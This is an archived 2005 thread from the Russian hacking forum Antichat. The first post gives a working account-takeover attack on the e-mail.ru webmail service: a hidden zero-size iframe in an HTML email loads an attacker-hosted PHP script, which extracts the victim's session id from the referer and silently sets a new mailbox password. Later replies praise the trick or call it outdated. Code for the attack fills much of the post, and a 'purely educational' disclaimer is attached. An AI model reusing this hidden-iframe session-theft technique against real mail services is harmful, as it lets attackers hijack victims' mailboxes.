ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Захват ящика на e-mail.ru |
20.03.2005, 15:37
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Захват ящика на e-mail.ru
В продолжении обзора багов во второстепенных почтовых серверах рунета...:
Сервер не использует cookie, идентификация пользователя осуществляется только по id.
Собственно сам баг заключается в том, что пароль к ящику можно изменить, не зная старого пароля.
Сервер не фильтрует тег iframe, что позволяет нам встроить в страницу свой скрипт на php, на который передаётся referer, из которого мы и вырежем идентификатор сессии.
Посылаем жертве письмо в html формате вида :
Код HTML:
<iframe src="http://adres_skripta/skript.php" height=0 width=0 scrolling=no frameborder=no></iframe>
Используем передачу данных с помощью метода GET.
skript:
PHP код:
<?
$nachalo=strpos("$HTTP_REFERER","@e-mail.ru_")+11; // ищем номер позиции, с которой начинается id
$konec=strpos("$HTTP_REFERER","&fld="); // ищем номер позиции, на которой заканчивается id
$dlina=$konec-$nachalo; // получаем длину id
$id=substr("$HTTP_REFERER","$nachalo","$dlina"); // вырезаем id из referer
// Для того чтоб не изменять каждый раз скрипт мы будем вырезать ещё и адрес мыла
$nachalo2=strpos("$HTTP_REFERER","utoken=")+7;
$konec2=$nachalo-11;
$dlina2=$konec2-$nachalo2;
$milo=substr("$HTTP_REFERER","$nachalo2","$dlina2");
echo "<html>
<iframe src=http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd1&utoken={$milo}@e-mail.ru_{$id}&show=passwd.tpl&pass=PAROL&repass=PAROL></iframe>
</html>";
// PAROL - это пароль каторый надо установить
?>
Таким образом, уязвимость браузеронезависима
P.S. Изменяя таким образом пароль, у ящика становится 2 пароля (старый действителен до тех пор, пока не будет введён новый)
P.SS ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ.
Автор: Mayor |
|
|
21.03.2005, 15:03
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
популярная уязвимость =) админы почтовиков сильно тормозят))) Mayor РЕСПЕКТ  |
|
|
|
22.02.2007, 15:46
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162
Репутация:
1320
|
|
гыгыыы.... Майор, реально респект!!!! гыгыгыгыы
/me ушел ломать весь интр0нет и пригородные поезда... гыгыы
ДиДжей убийца, ты на дату посмотрел? ыггы
|
|
|
|
23.02.2007, 11:59
|
|
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072
Репутация:
362
|
|
Полезная вещь... была лет этак 2 назад =))))))))
Популяция археологов-некрофилов реско возрастает, кащейчег, не находишь? =))))
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
